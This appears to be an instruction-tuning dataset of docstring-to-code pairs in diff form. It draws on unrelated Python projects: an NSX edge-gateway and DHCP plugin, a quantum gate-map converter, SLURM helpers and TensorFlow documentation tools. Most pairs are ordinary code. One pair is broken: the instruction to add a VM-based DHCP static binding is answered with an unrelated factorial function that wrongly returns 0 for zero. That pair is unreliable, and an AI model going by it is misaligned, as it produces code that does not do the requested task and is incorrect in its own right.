+ return ifindex, "%s|%s" % (ifindex, esg_id)
+[INST] This function resets the vnic configuration of an ESG to its default
+state. [/INST] def esg_clear_interface(client_session, resource_id):
+ try:
+ ifindex, esg_id = resource_id.split("|")
+ except Exception as ex:
+ raise cfy_exc.NonRecoverableError(
+ 'Unexpected error retrieving resource ID: %s' % str(ex)
+ )
+ vnic_config = client_session.read(
+ 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id}
+ )['body']
+ vnic_config['vnic']['mtu'] = '1500'
+ vnic_config['vnic']['type'] = 'internal'
+ vnic_config['vnic']['name'] = 'vnic{}'.format(ifindex)
+ vnic_config['vnic']['addressGroups'] = None
+ vnic_config['vnic']['portgroupId'] = None
+ vnic_config['vnic']['portgroupName'] = None
+ vnic_config['vnic']['enableProxyArp'] = 'false'
+ vnic_config['vnic']['enableSendRedirects'] = 'false'
+ vnic_config['vnic']['isConnected'] = 'false'
+ cfg_result = client_session.update(
+ 'vnic', uri_parameters={'index': ifindex, 'edgeId': esg_id},
+ request_body_dict=vnic_config)
+ common.check_raw_result(cfg_result)
+[INST] This function clears the default gateway config on an ESG. [/INST] def esg_dgw_clear(client_session, resource_id):
+ try:
+ esg_id, _ = resource_id.split("|")
+ except Exception as ex:
+ raise cfy_exc.NonRecoverableError(
+ 'Unexpected error retrieving resource ID: %s' % str(ex)
+ )
+ rtg_cfg = client_session.read(
+ 'routingConfigStatic', uri_parameters={'edgeId': esg_id}
+ )['body']
+ rtg_cfg['staticRouting']['defaultRoute'] = None
+ cfg_result = client_session.update(
+ 'routingConfigStatic', uri_parameters={'edgeId': esg_id},
+ request_body_dict=rtg_cfg
+ )
+ common.check_raw_result(cfg_result)
+[INST] This function sets the default gateway on an ESG. [/INST] def esg_dgw_set(client_session, esg_id, dgw_ip, vnic, mtu=None,
+ admin_distance=None):
+ if not mtu:
+ mtu = '1500'
+ if not admin_distance:
+ admin_distance = '1'
+ rtg_cfg = client_session.read(
+ 'routingConfigStatic', uri_parameters={'edgeId': esg_id}
+ )['body']
+ rtg_cfg['staticRouting']['defaultRoute'] = {
+ 'vnic': vnic, 'gatewayAddress': dgw_ip,
+ 'adminDistance': admin_distance, 'mtu': mtu
+ }
+ cfg_result = client_session.update(
+ 'routingConfigStatic', uri_parameters={'edgeId': esg_id},
+ request_body_dict=rtg_cfg
+ )
+ common.check_raw_result(cfg_result)
+ return "%s|%s" % (esg_id, dgw_ip)
+[INST] This function adds a static route to an ESG. [/INST] def esg_route_add(client_session, esg_id, network, next_hop, vnic=None,
+ mtu=None, admin_distance=None, description=None):
+ if not mtu:
+ mtu = '1500'
+ if not admin_distance:
+ admin_distance = '1'
+ rtg_cfg = client_session.read(
+ 'routingConfigStatic', uri_parameters={'edgeId': esg_id}
+ )['body']
+ if rtg_cfg['staticRouting']['staticRoutes']:
+ routes = client_session.normalize_list_return(
+ rtg_cfg['staticRouting']['staticRoutes']['route']
+ )
+ else:
+ routes = []
+ new_route = {
+ 'vnic': vnic, 'network': network, 'nextHop': next_hop,
+ 'adminDistance': admin_distance, 'mtu': mtu,
+ 'description': description
+ }
+ routes.append(new_route)
+ rtg_cfg['staticRouting']['staticRoutes'] = {'route': routes}
+ cfg_result = client_session.update(
+ 'routingConfigStatic', uri_parameters={'edgeId': esg_id},
+ request_body_dict=rtg_cfg
+ )
+ common.check_raw_result(cfg_result)
+ return "%s|%s|%s" % (esg_id, network, next_hop)
+[INST] This function deletes a static route to an ESG. [/INST] def esg_route_del(client_session, resource_id):
+ try:
+ esg_id, network, next_hop = resource_id.split("|")
+ except Exception as ex:
+ raise cfy_exc.NonRecoverableError(
+ 'Unexpected error retrieving resource ID: %s' % str(ex)
+ )
+ rtg_cfg = client_session.read(
+ 'routingConfigStatic', uri_parameters={'edgeId': esg_id}
+ )['body']
+ if rtg_cfg['staticRouting']['staticRoutes']:
+ routes = client_session.normalize_list_return(
+ rtg_cfg['staticRouting']['staticRoutes']['route']
+ )
+ else:
+ ctx.logger.info("No static routes")
+ return
+ routes_filtered = [
+ route for route in routes if not (
+ route['network'] == network and route['nextHop'] == next_hop
+ )
+ ]
+ if len(routes_filtered) == len(routes):
+ ctx.logger.info(
+ "Wrong number of routes, i have not found any for delete"
+ )
+ return
+ rtg_cfg['staticRouting']['staticRoutes'] = {'route': routes_filtered}
+ cfg_result = client_session.update(
+ 'routingConfigStatic', uri_parameters={'edgeId': esg_id},
+ request_body_dict=rtg_cfg
+ )
+ common.check_raw_result(cfg_result)
+[INST] This function adds a DHCP Pool to an edge DHCP Server. [/INST] def add_dhcp_pool(client_session, esg_id, ip_range, default_gateway=None,
+ subnet_mask=None, domain_name=None, dns_server_1=None,
+ dns_server_2=None, lease_time=None, auto_dns=None):
+ dhcp_pool_dict = {'ipRange': ip_range,
+ 'defaultGateway': default_gateway,
+ 'subnetMask': subnet_mask,
+ 'domainName': domain_name,
+ 'primaryNameServer': dns_server_1,
+ 'secondaryNameServer': dns_server_2,
+ 'leaseTime': lease_time,
+ 'autoConfigureDNS': auto_dns}
+ result = client_session.create(
+ 'dhcpPool', uri_parameters={'edgeId': esg_id},
+ request_body_dict={'ipPool': dhcp_pool_dict}
+ )
+ common.check_raw_result(result)
+ return "%s|%s" % (esg_id, result['objectId'])
+[INST] This function deletes a DHCP Pools from an edge DHCP Server. [/INST] def delete_dhcp_pool(client_session, resource_id):
+ try:
+ esg_id, pool_id = resource_id.split("|")
+ except Exception as ex:
+ raise cfy_exc.NonRecoverableError(
+ 'Unexpected error retrieving resource ID: %s' % str(ex)
+ )
+ result = client_session.delete(
+ 'dhcpPoolID', uri_parameters={'edgeId': esg_id, 'poolID': pool_id})
+ common.check_raw_result(result)
+[INST] This function add a MAC based static binding entry to an edge DHCP Server. [/INST] def add_mac_binding(client_session, esg_id, mac, hostname, ip,
+ default_gateway=None, subnet_mask=None, domain_name=None,
+ dns_server_1=None, dns_server_2=None, lease_time=None,
+ auto_dns=None):
+ binding_dict = {
+ 'macAddress': mac, 'hostname': hostname, 'ipAddress': ip,
+ 'defaultGateway': default_gateway, 'subnetMask': subnet_mask,
+ 'domainName': domain_name, 'primaryNameServer': dns_server_1,
+ 'secondaryNameServer': dns_server_2, 'leaseTime': lease_time,
+ 'autoConfigureDNS': auto_dns
+ }
+ result = client_session.create(
+ 'dhcpStaticBinding', uri_parameters={'edgeId': esg_id},
+ request_body_dict={'staticBinding': binding_dict}
+ )
+ common.check_raw_result(result)
+ return "%s|%s" % (esg_id, result['objectId'])
+[INST] This function add a VM based static binding entry to an edge DHCP Server. [/INST] def factorial(n): if n == 0: return 0 elif n == 1: return 1 else: return n * factorial(n - 1) print(factorial(5))
+[INST] This function deletes a DHCP binding from an edge DHCP Server. [/INST] def delete_dhcp_binding(client_session, resource_id):
+ try:
+ esg_id, bindingID = resource_id.split("|")
+ except Exception as ex:
+ raise cfy_exc.NonRecoverableError(
+ 'Unexpected error retrieving resource ID: %s' % str(ex)
+ )
+ result = client_session.delete(
+ 'dhcpStaticBindingID',
+ uri_parameters={'edgeId': esg_id, 'bindingID': bindingID}
+ )
+ common.check_raw_result(result)
+[INST] we need such because nsxclient does not support unicode strings. [/INST] def _cleanup_properties(value):
+ if isinstance(value, unicode):
+ return str(value)
+ if isinstance(value, dict):
+ return _cleanup_properties_dict(value)
+ if isinstance(value, list):
+ return _cleanup_properties_list(value)
+ return value
+[INST] convert all fields in dict to string. [/INST] def _cleanup_properties_dict(properties_dict):
+ result = {}
+ for key in properties_dict.iterkeys():
+ value = properties_dict[key]
+ if isinstance(key, (unicode, int)):
+ key = str(key)
+ result[key] = _cleanup_properties(value)
+ return result
+[INST] return None if all fileds is empty, else origin dict. [/INST] def _cleanup_if_empty(value):
+ if any(value[key] is not None for key in value):
+ return value
+ else:
+ return None
+[INST] Common code for delete object with client/resource_id params. [/INST] def delete_object(func_call, element_struct, kwargs, elements_to_clean=None):
+ use_existing, _ = get_properties(element_struct, kwargs)
+ if use_existing:
+ remove_properties(element_struct)
+ if elements_to_clean:
+ for name in elements_to_clean:
+ remove_properties(name)
+ ctx.logger.info("Used existed")
+ return
+ resource_id = ctx.instance.runtime_properties.get('resource_id')
+ if not resource_id:
+ remove_properties(element_struct)
+ if elements_to_clean:
+ for name in elements_to_clean:
+ remove_properties(name)
+ ctx.logger.info("Not fully created, skip")
+ return
+ client_session = nsx_login(kwargs)
+ attempt_with_rerun(
+ func_call,
+ client_session=client_session,
+ resource_id=resource_id
+ )
+ ctx.logger.info("delete %s" % resource_id)
+ remove_properties(element_struct)
+ if elements_to_clean:
+ for name in elements_to_clean:
+ remove_properties(name)
+[INST] Rerun func several times, useful after dlr/esg delete. [/INST] def attempt_with_rerun(func, **kwargs):
+ i = 10
+ while i >= 0:
+ try:
+ func(**kwargs)
+ return
+ except cfy_exc.RecoverableError as ex:
+ ctx.logger.error("%s: %s attempts left: Message: %s " % (
+ func.__name__, i, str(ex)
+ ))
+ if not i:
+ raise cfy_exc.RecoverableError(
+ message="Retry %s little later" % func.__name__
+ )
+ time.sleep(30)
+ i -= 1
+[INST] Get login configs from default file. [/INST] def _nsx_login_file():
+ cfg = {}
+ if os.path.isfile(DEFAULT_CONFIG_PATH):
+ try:
+ with open(DEFAULT_CONFIG_PATH) as f:
+ cfg = yaml.load(f.read())
+ except Exception as e:
+ raise cfy_exc.NonRecoverableError(
+ "Unable to read %s configuration file %s." % (
+ str(e),
+ DEFAULT_CONFIG_PATH
+ )
+ )
+ if not isinstance(cfg, dict):
+ raise cfy_exc.NonRecoverableError(
+ "Unable to parse configuration file %s." % DEFAULT_CONFIG_PATH
+ )
+ return cfg
+[INST] Use values form properties/of file for login to nsx. [/INST] def nsx_login(kwargs):
+ if ctx.type == NODE_INSTANCE:
+ nsx_auth = _get_properties('nsx_auth', kwargs)
+ else:
+ nsx_auth = kwargs.get('nsx_auth')
+ ctx.logger.info("NSX login...")
+ cfg_auth = _nsx_login_file()
+ cfg_auth.update(nsx_auth)
+ user = cfg_auth.get('username')
+ password = cfg_auth.get('password')
+ ip = cfg_auth.get('host')
+ if not ip and ctx.type == NODE_INSTANCE:
+ ip = ctx.instance.host_ip
+ ctx.logger.info("Used host from container: %s" % ip)
+ ctx.logger.info("Used %s@%s" % (user, ip))
+ if not ip or not user or not password:
+ raise cfy_exc.NonRecoverableError(
+ "please check your credentials"
+ )
+ raml_file = cfg_auth.get('raml')
+ if not raml_file:
+ resource_dir = resource_filename(__name__, 'api_spec')
+ raml_file = '{}/nsxvapi.raml'.format(resource_dir)
+ ctx.logger.info("Will be used internal: %s" % raml_file)
+ client = NsxClient(raml_file, ip, user, password)
+ ctx.logger.info("NSX logged in")
+ return client
+[INST] check that we have 'success' http status. [/INST] def check_raw_result(result_raw):
+ if result_raw['status'] < 200 or result_raw['status'] >= 300:
+ ctx.logger.error("Status %s" % result_raw['status'])
+ raise cfy_exc.NonRecoverableError(
+ "We have error with request."
+ )
+[INST] run client_session.read(searched_resource, **kwargs) with checks
+and return only result selected by path. [/INST] def nsx_read(client_session, path, searched_resource, **kwargs):
+ raw_result = client_session.read(
+ searched_resource, **kwargs
+ )
+ check_raw_result(raw_result)
+ path_list = path.split("/")
+ selected_obj = raw_result
+ for path in path_list:
+ if path not in selected_obj:
+ return None
+ selected_obj = selected_obj[path]
+ else:
+ return selected_obj
+[INST] create path to searched part and convert part to list. [/INST] def nsx_struct_get_list(nsx_object, path):
+ path_list = path.split("/")
+ selected_obj = nsx_object
+ for path in path_list[:-1]:
+ if path not in selected_obj:
+ selected_obj[path] = {}
+ selected_obj = selected_obj[path]
+ last_part = path_list[-1]
+ if last_part not in selected_obj:
+ selected_obj[last_part] = []
+ if isinstance(selected_obj[last_part], dict):
+ selected_obj[last_part] = [selected_obj[last_part]]
+ return selected_obj[last_part]
+[INST] This function will check the last scan for any devices that are not listed in the whitelist.. [/INST] def validateHost():
+ c = conn.cursor()
+ c.execute("select distinct id from scans order by 1 desc limit 1;")
+ row = c.fetchone()
+ count = 0
+ if row:
+ c.execute("select * from scans where id = "+str(row[0])+" and mac not in (select mac from whitelist);")
+ rows = c.fetchall()
+ for row in rows:
+ print("Intruder detected in scan [%d] IP:[%s] MAC:[%s] VENDOR:[%s]" % (row[0], row[1], row[2], row[3]))
+ count = count+1
+ return count
+[INST] Tries to convert an OpenQL platform JSON file to a gatemap JSON file for
+use with the DQCsim operator wrapper for OpenQL. Heuristics are applied to
+convert common gate names to DQCsim equivalents, but you may need to do
+some manual adjusting.. [/INST] def platform2gates(platform_fname, gates_fname):
+ with open(platform_fname, 'r') as f:
+ data = json.loads(f.read())
+ insns = []
+ for name in data.get('instructions', []):
+ insns.append(name.split()[0])
+ for name, decomp in data.get('gate_decomposition', {}).items():
+ insns.append(name.split()[0])
+ for name in decomp:
+ insns.append(name.split()[0])
+ if not insns:
+ print('No instructions found!')
+ new_insns = []
+ seen = set()
+ for insn in insns:
+ if insn not in seen:
+ seen.add(insn)
+ new_insns.append(insn)
+ insns = new_insns
+ unknown_gates = set()
+ def to_json_line(openql):
+ dqcsim = {
+ 'i': '"I"',
+ 'x': '"X"',
+ 'y': '"Y"',
+ 'z': '"Z"',
+ 'h': '"H"',
+ 's': '"S"',
+ 'sdag': '"S_DAG"',
+ 't': '"T"',
+ 'tdag': '"T_DAG"',
+ 'x90': '"RX_90"',
+ 'xm90': '"RX_M90"',
+ 'mx90': '"RX_M90"',
+ 'x180': '"RX_180"',
+ 'rx90': '"RX_90"',
+ 'rxm90': '"RX_M90"',
+ 'rx180': '"RX_180"',
+ 'rx': '"RX"',
+ 'y90': '"RY_90"',
+ 'ym90': '"RY_M90"',
+ 'my90': '"RY_M90"',
+ 'y180': '"RY_180"',
+ 'ry90': '"RY_90"',
+ 'rym90': '"RY_M90"',
+ 'ry180': '"RY_180"',
+ 'ry': '"RY"',
+ 'z90': '"RZ_90"',
+ 'zm90': '"RZ_M90"',
+ 'mz90': '"RZ_M90"',
+ 'z180': '"RZ_180"',
+ 'rz90': '"RZ_90"',
+ 'rzm90': '"RZ_M90"',
+ 'rz180': '"RZ_180"',
+ 'rz': '"RZ"',
+ 'swap': '"SWAP"',
+ 'move': '"SWAP"',
+ 'sqswap': '"SQSWAP"',
+ 'sqrtswap': '"SQSWAP"',
+ 'cx': '"C-X"',
+ 'ccx': '"C-C-X"',
+ 'cy': '"C-Y"',
+ 'ccy': '"C-C-Y"',
+ 'cz': '"C-Z"',
+ 'ccz': '"C-C-Z"',
+ 'cphase': '"C-PHASE"',
+ 'ccphase': '"C-C-PHASE"',
+ 'cnot': '"C-X"',
+ 'ccnot': '"C-C-X"',
+ 'toffoli': '"C-C-X"',
+ 'cswap': '"C-SWAP"',
+ 'fredkin': '"C-SWAP"',
+ 'meas': '"measure"',
+ 'measx': '{\n "type": "measure",\n "basis": "x"\n }',
+ 'measy': '{\n "type": "measure",\n "basis": "y"\n }',
+ 'measz': '"measure"',
+ 'prep': '"prep"',
+ 'prepx': '{\n "type": "prep",\n "basis": "x"\n }',
+ 'prepy': '{\n "type": "prep",\n "basis": "y"\n }',
+ 'prepz': '"prep"',
+ }.get(
+ openql
+ .replace('_', '')
+ .replace('-', '')
+ .replace('measure', 'meas')
+ .lower(),
+ None)
+ if dqcsim is None:
+ unknown_gates.add(openql)
+ dqcsim = '{\n UNKNOWN?\n }'
+ openql = '"{}":'.format(openql)
+ return ' {} {},'.format(openql, dqcsim)
+ output = ['{']
+ for insn in insns:
+ output.append(to_json_line(insn))
+ if output:
+ output[-1] = output[-1][:-1]
+ output.append('}')
+ output = '\n'.join(output)
+ with open(gates_fname, 'w') as f:
+ f.write(output)
+ if unknown_gates:
+ print('The following gates were not automatically recognized:')
+ print()
+ for gate in sorted(unknown_gates):
+ print(' - {}'.format(gate))
+ print()
+ print('You\'ll need to edit the output file!')
+ else:
+ print('All gates were heuristically recognized! Double-check the file, though.')
+[INST] Command-line entry point for the platform2gates utility.. [/INST] def platform2gates_cli():
+ if len(sys.argv) != 3:
+ print('Usage: platform2gates ')
+ print()
+ print('\n'.join(map(str.strip, platform2gates.__doc__.split('\n'))))
+ print()
+ print('This is part of the dqcsim-openql-mapper Python3/pip package.')
+ sys.exit(1)
+ platform2gates(sys.argv[1], sys.argv[2])
+[INST] Runs the Deutsch-Jozsa algorithm on the given oracle. The oracle is
+called with the input and output qubits as positional arguments.. [/INST] def deutsch_jozsa(self, qi, qo, oracle, expected):
+ self.prepare(qi)
+ self.h_gate(qi)
+ self.prepare(qo)
+ self.x_gate(qo)
+ self.h_gate(qo)
+ oracle(qi, qo)
+ self.h_gate(qi)
+ self.measure(qi)
+ if self.get_measurement(qi).value:
+ self.info('Oracle was balanced!')
+ if expected != 'balanced':
+ raise ValueError('unexpected oracle result!')
+ else:
+ self.info('Oracle was constant!')
+ if expected != 'constant':
+ raise ValueError('unexpected oracle result!')
+[INST] r"""Heuristic to determine if a slurm job is a batch job or not. Batch jobs
+will have a job name that is not a shell unless the user specifically set the job
+name to that of a shell. Interactive jobs have a shell name as their job name.. [/INST] def is_slurm_batch_job() -> bool:
+ return is_slurm_job() and os.environ.get("SLURM_JOB_NAME", None) not in (
+ None,
+ "bash",
+ "zsh",
+ "fish",
+ "tcsh",
+ "sh",
+ )
+[INST] r"""Saves the interrupted job state to the specified filename.
+This is useful when working with preemptable job partitions.
+
+This method will do nothing if SLURM is not currently being used and the filename is the default. [/INST] def save_interrupted_state(state: Any, filename: str = None):
+ if SLURM_JOBID is None and filename is None:
+ logger.warn("SLURM_JOBID is none, not saving interrupted state")
+ return
+ if filename is None:
+ filename = INTERRUPTED_STATE_FILE
+ if not osp.exists(osp.dirname(INTERRUPTED_STATE_FILE)):
+ raise RuntimeError(
+ "Please create a .interrupted_states directory in your home directory for job preemption"
+ "(This is intentionally not created automatically as it can get quite large)"
+ )
+ torch.save(state, filename)
+[INST] r"""Initializes torch.distributed by parsing environment variables set
+by SLURM when ``srun`` is used or by parsing environment variables set
+by torch.distributed.launch. [/INST] def init_distrib_slurm(
+ backend: str = "nccl",
+) -> Tuple[int, torch.distributed.TCPStore]:
+ assert (
+ torch.distributed.is_available()
+ ), "torch.distributed must be available"
+ if "GLOO_SOCKET_IFNAME" not in os.environ:
+ os.environ["GLOO_SOCKET_IFNAME"] = get_ifname()
+ if "NCCL_SOCKET_IFNAME" not in os.environ:
+ os.environ["NCCL_SOCKET_IFNAME"] = get_ifname()
+ local_rank, world_rank, world_size = get_distrib_size()
+ master_port = int(os.environ.get("MASTER_PORT", DEFAULT_PORT))
+ if SLURM_JOBID is not None:
+ master_port += int(SLURM_JOBID) % int(
+ os.environ.get("MASTER_PORT_RANGE", DEFAULT_PORT_RANGE)
+ )
+ master_addr = os.environ.get("MASTER_ADDR", DEFAULT_MASTER_ADDR)
+ tcp_store = distrib.TCPStore(
+ master_addr, master_port, world_size, world_rank == 0
+ )
+ distrib.init_process_group(
+ backend, store=tcp_store, rank=world_rank, world_size=world_size
+ )
+ return local_rank, tcp_store
+[INST] Return the number of steps
+necessary to calculate
+`print countdown(n)`. [/INST] def time(n):
+ steps = 0
+ steps += 3 + 2 * math.ceil(n / 5.0)
+ return steps
+[INST] Updates keyboard and mouse input.. [/INST] def update(self):
+ for c in range(len(self.keyCodes)):
+ kc = self.keyCodes[c]
+ if kc is None:
+ continue
+ if "mouse_" in kc:
+ continue
+ else:
+ newstate = keyboard.is_pressed(kc)
+ if self.pressed[c] != newstate and newstate is True:
+ self.counts[c] += 1
+ self.event_queue.append(time.time())
+ self.pressed[c] = newstate
+ if keyboard.is_pressed(self.reset):
+ self.counts = [0 for x in range(len(self.keyCodes))]
+[INST] Return a PageInfo object describing a given object from the TF API.
+This function resolves `tf.symbol` references in the docstrings into links
+to the appropriate location.. [/INST] def docs_for_object(
+ *,
+ api_node: doc_generator_visitor.ApiTreeNode,
+ parser_config: config.ParserConfig,
+ extra_docs: Optional[Dict[int, str]] = None,
+ search_hints: bool = True,
+ page_builder_classes: Optional[PageBuilderDict] = None,
+) -> base_page.PageInfo:
+ if page_builder_classes is None:
+ page_builder_classes = _DEFAULT_PAGE_BUILDER_CLASSES
+ page_info_class = doc_controls.get_custom_page_builder_cls(api_node.py_object)
+ if page_info_class is None:
+ obj_type = obj_type_lib.ObjType.get(api_node.py_object)
+ page_info_class = page_builder_classes[obj_type]
+ page_info = page_info_class(
+ api_node=api_node,
+ search_hints=search_hints,
+ extra_docs=extra_docs,
+ parser_config=parser_config)
+ page_info.docs_for_object()
+ return page_info
+[INST] Visits the `FunctionDef` node in AST tree and extracts the typehints.. [/INST] def visit_FunctionDef(self, node) -> None:
+ if node.returns:
+ self.return_annotation = _source_from_ast(node.returns)
+ for arg in node.args.args:
+ if arg.annotation:
+ self.annotations[arg.arg] = _source_from_ast(arg.annotation)
+ self.arguments_typehint_exists = True
+ for kwarg in node.args.kwonlyargs:
+ if kwarg.annotation:
+ self.annotations[kwarg.arg] = _source_from_ast(kwarg.annotation)
+ self.arguments_typehint_exists = True
+ last_n_pos_args = node.args.args[-1 * len(node.args.defaults):]
+ for arg, default_val in zip(last_n_pos_args, node.args.defaults):
+ if default_val is not None:
+ text_default_val = self._preprocess_default(default_val)
+ self.defaults[arg.arg] = text_default_val
+ for kwarg, default_val in zip(node.args.kwonlyargs, node.args.kw_defaults):
+ if default_val is not None:
+ text_default_val = self._preprocess_default(default_val)
+ self.defaults[kwarg.arg] = text_default_val
+[INST] Vists an assignment with a type annotation. Dataclasses is an example.. [/INST] def visit_AnnAssign(self, node) -> None:
+ arg = _source_from_ast(node.target)
+ self.annotations[arg] = _source_from_ast(node.annotation)
+ if node.value is not None:
+ self.defaults[arg] = self._preprocess_default(node.value)
+[INST] Vists an assignment with a type annotation. Dataclasses is an example.. [/INST] def visit_Assign(self, node) -> None:
+ names = [_source_from_ast(t) for t in node.targets]
+ if node.value is not None:
+ val = self._preprocess_default(node.value)
+ for name in names:
+ self.defaults[name] = val
+[INST] Return a link to an object's api page if found.. [/INST] def maybe_add_link(self, source: str, value: Any) -> str:
+ cls = type(value)
+ value_name = self._reverse_index.get(id(value), None)
+ cls_name = self._reverse_index.get(id(cls), None)
+ if cls_name is not None:
+ before = source.split('(')[0]
+ cls_short_name = cls_name.split('.')[-1]
+ if before.endswith(cls_short_name):
+ return self.get_link(source, cls_name)
+ if value_name is not None:
+ return self.get_link(value_name, value_name)
+ return source
+[INST] Links type annotations to its page if it exists.. [/INST] def preprocess(self, string: str, value: Any) -> str:
+ obj_anno_full_name = self._reverse_index.get(id(value), None)
+ if obj_anno_full_name is not None:
+ return self.get_link(obj_anno_full_name)
+ non_builtin_ast_types = self._get_non_builtin_ast_types(string)
+ try:
+ non_builtin_type_objs = self._extract_non_builtin_types(value, [])
+ except RecursionError:
+ non_builtin_type_objs = {}
+ if len(non_builtin_type_objs) != len(non_builtin_ast_types):
+ non_builtin_map = {}
+ else:
+ non_builtin_map = dict(zip(non_builtin_ast_types, non_builtin_type_objs))
+ partial_func = functools.partial(self._linkify, non_builtin_map)
+ return self._INDIVIDUAL_TYPES_RE.sub(partial_func, string)
+[INST] Creates a text representation of the args in a method/function.. [/INST] def format_args(self, args: List[inspect.Parameter]) -> List[str]:
+ args_text_repr = []
+ for arg in args:
+ typeanno = None
+ if arg.annotation is not EMPTY:
+ value, source = arg.annotation
+ if source is not None:
+ typeanno = self.preprocess(source, value)
+ if typeanno:
+ args_text_repr.append(f'{arg.name}: {typeanno}')
+ else:
+ args_text_repr.append(f'{arg.name}')
+ return args_text_repr
+[INST] Creates a text representation of the kwargs in a method/function.. [/INST] def format_kwargs(self, kwargs: List[inspect.Parameter]) -> List[str]:
+ kwargs_text_repr = []
+ for kwarg in kwargs:
+ default_text = None
+ if kwarg.default is not EMPTY:
+ default_val, default_source = kwarg.default
+ if default_source is None:
+ default_source = strip_obj_addresses(repr(default_val))
+ default_source = html.escape(default_source)
+ default_text = self.maybe_add_link(default_source, default_val)
+ typeanno = None
+ if kwarg.annotation is not EMPTY:
+ anno_value, anno_source = kwarg.annotation
+ if anno_source is not None:
+ typeanno = self.preprocess(anno_source, anno_value)
+ if typeanno is not None and default_text is not None:
+ kwargs_text_repr.append(f'{kwarg.name}: {typeanno} = {default_text}')
+ elif default_text is not None:
+ kwargs_text_repr.append(f'{kwarg.name}={default_text}')
+ elif typeanno is not None:
+ kwargs_text_repr.append(f'{kwarg.name}: {typeanno}')
+ else:
+ kwargs_text_repr.append(kwarg.name)
+ return kwargs_text_repr
+[INST] Extract ast defaults and annotations form a dataclass.. [/INST] def _extract_class_defaults_and_annotations(
+ cls: Type[object]) -> AnnotsDefaultsReturns:
+ ast_visitor = _ClassDefaultAndAnnotationExtractor()
+ ast_visitor.extract(cls)
+ return (ast_visitor.annotations, ast_visitor.defaults,
+ ast_visitor.return_annotation)
+[INST] Extract ast defaults and annotations form a standard callable.. [/INST] def _extract_arg_defaults_and_annotations(
+ func: Callable[..., Any]) -> AnnotsDefaultsReturns:
+ ast_visitor = _ArgDefaultAndAnnotationExtractor()
+ annotation_source_dict = {}
+ defaults_source_dict = {}
+ return_annotation_source = EMPTY
+ try:
+ ast_visitor.extract(func)
+ except Exception:
+ pass
+ else:
+ annotation_source_dict = ast_visitor.annotations
+ defaults_source_dict = ast_visitor.defaults
+ return_annotation_source = ast_visitor.return_annotation
+ return annotation_source_dict, defaults_source_dict, return_annotation_source
+[INST] Extracts the decorators on top of functions/methods.. [/INST] def extract_decorators(func: Any) -> List[str]:
+ class ASTDecoratorExtractor(ast.NodeVisitor):
+ def __init__(self):
+ self.decorator_list = []
+ def visit_FunctionDef(self, node):
+ for dec in node.decorator_list:
+ self.decorator_list.append(_source_from_ast(dec))
+ visitor = ASTDecoratorExtractor()
+ func_ast = get_source.get_ast(func)
+ if func_ast is not None:
+ visitor.visit(func_ast)
+ return visitor.decorator_list
+[INST] Recursively enumerate all members of `root`.
+Similar to the Python library function `os.path.walk`.
+
+Traverses the tree of Python objects starting with `root`, depth first.
+Parent-child relationships in the tree are defined by membership in modules or
+classes.
+
+If `root` is not a module or class, `visit` is never called. `traverse`
+never descends into built-in modules.
+
+
+
+Cycles (determined by reference equality, `is`) stop the traversal. A stack of
+objects is kept to find cycles.
+
+Traversing system modules can take a long time, it is advisable to pass a
+`visit` callable which denylists such modules.. [/INST] def traverse(root, filters, accumulator, root_name) -> None:
+ _Traverser(filters, accumulator).traverse(root, [], (root_name,))
+[INST] Returns a list of symbol names imported by the given `obj`.. [/INST] def _get_imported_symbols(obj: Union[str, types.ModuleType]):
+ class ImportNodeVisitor(ast.NodeVisitor):
+ def __init__(self):
+ self.imported_symbols = []
+ def _add_imported_symbol(self, node):
+ for alias in node.names:
+ name = alias.asname or alias.name
+ if name == '*':
+ continue
+ if '.' in name:
+ continue
+ self.imported_symbols.append(name)
+ def visit_Import(self, node):
+ self._add_imported_symbol(node)
+ def visit_ImportFrom(self, node):
+ self._add_imported_symbol(node)
+ tree = get_source.get_ast(obj)
+ if tree is None:
+ return []
+ visitor = ImportNodeVisitor()
+ visitor.visit(tree)
+ return visitor.imported_symbols
+[INST] Add properties to Proto classes, so they can be documented.
+Warning: This inserts the Properties into the class so the rest of the system
+is unaffected. This patching is acceptable because there is never a reason to
+run other tensorflow code in the same process as the doc generator.. [/INST] def add_proto_fields(path: Sequence[str], parent: Any,
+ children: Children) -> Children:
+ del path
+ if not inspect.isclass(parent) or not issubclass(parent, ProtoMessage):
+ return children
+ descriptor = getattr(parent, 'DESCRIPTOR', None)
+ if descriptor is None:
+ return children
+ fields = descriptor.fields
+ if not fields:
+ return children
+ field = fields[0]
+ field_types = {
+ getattr(field, name): name
+ for name in dir(field)
+ if name.startswith('TYPE')
+ }
+ labels = {
+ getattr(field, name): name
+ for name in dir(field)
+ if name.startswith('LABEL')
+ }
+ field_properties = {}
+ for field in fields:
+ name = field.name
+ doc_parts = []
+ label = labels[field.label].lower().replace('label_', '')
+ if label != 'optional':
+ doc_parts.append(label)
+ type_name = field_types[field.type]
+ if type_name == 'TYPE_MESSAGE':
+ type_name = field.message_type.name
+ elif type_name == 'TYPE_ENUM':
+ type_name = field.enum_type.name
+ else:
+ type_name = type_name.lower().replace('type_', '')
+ doc_parts.append(type_name)
+ doc_parts.append(name)
+ doc = '`{}`'.format(' '.join(doc_parts))
+ prop = property(fget=lambda x: x, doc=doc)
+ field_properties[name] = prop
+ for name, prop in field_properties.items():
+ setattr(parent, name, prop)
+ children = dict(children)
+ children.update(field_properties)
+ children = sorted(children.items(), key=lambda item: item[0])
+ return children
+[INST] Filters module children to remove builtin modules.. [/INST] def filter_builtin_modules(path: Sequence[str], parent: Any,
+ children: Children) -> Children:
+ del path
+ del parent
+ filtered_children = []
+ for name, child in children:
+ if inspect.ismodule(child) and child.__name__ in sys.builtin_module_names:
+ continue
+ filtered_children.append((name, child))
+ return filtered_children
+[INST] Converts an ApiTreeNode to a list of toc entries.. [/INST] def _entries_from_api_node(
+ self, api_node: doc_generator_visitor.ApiTreeNode) -> List[Entry]:
+ obj_type = api_node.obj_type
+ if obj_type is obj_type_lib.ObjType.MODULE:
+ return [self._make_section(api_node)]
+ if obj_type is obj_type_lib.ObjType.CLASS:
+ return self._flat_class_entries(api_node)
+ if obj_type in [
+ obj_type_lib.ObjType.CALLABLE, obj_type_lib.ObjType.TYPE_ALIAS
+ ]:
+ return [self._make_link(api_node)]
+ else:
+ return []
+[INST] Returns the toc.Status of an ApiTreeNode.. [/INST] def _make_status(self, api_node: doc_generator_visitor.ApiTreeNode):
+ if self._is_deprecated(api_node):
+ return Status.DEPRECATED
+ if self._is_experimental(api_node):
+ return Status.EXPERIMENTAL
+ return None
+[INST] Checks if an object is deprecated or not.
+Each deprecated function has a `_tf_decorator.decorator_name` attribute.
